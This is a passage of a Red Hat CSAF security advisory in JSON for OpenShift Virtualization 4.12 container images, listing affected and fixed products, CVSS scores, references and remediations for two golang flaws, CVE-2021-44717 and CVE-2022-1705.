"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44717" }, { "category": "external", "summary": "RHBZ#2030806", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44717", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44717" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", "url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k" } ], "release_date": "2021-12-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" }, { "category": "workaround", "details": "This bug can be mitigated by raising the per-process file descriptor limit.", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: syscall: don\u0027t close fd 0 on ForkExec error" }, { "cve": "CVE-2022-1705", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107374" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating \"chunked\" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: net/http: improper sanitization of Transfer-Encoding header", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1705" }, { "category": "external", "summary": "RHBZ#2107374", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1705", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1705" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1705" }, { "category": "external", "summary": "https://go.dev/issue/53188", "url": "https://go.dev/issue/53188" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", 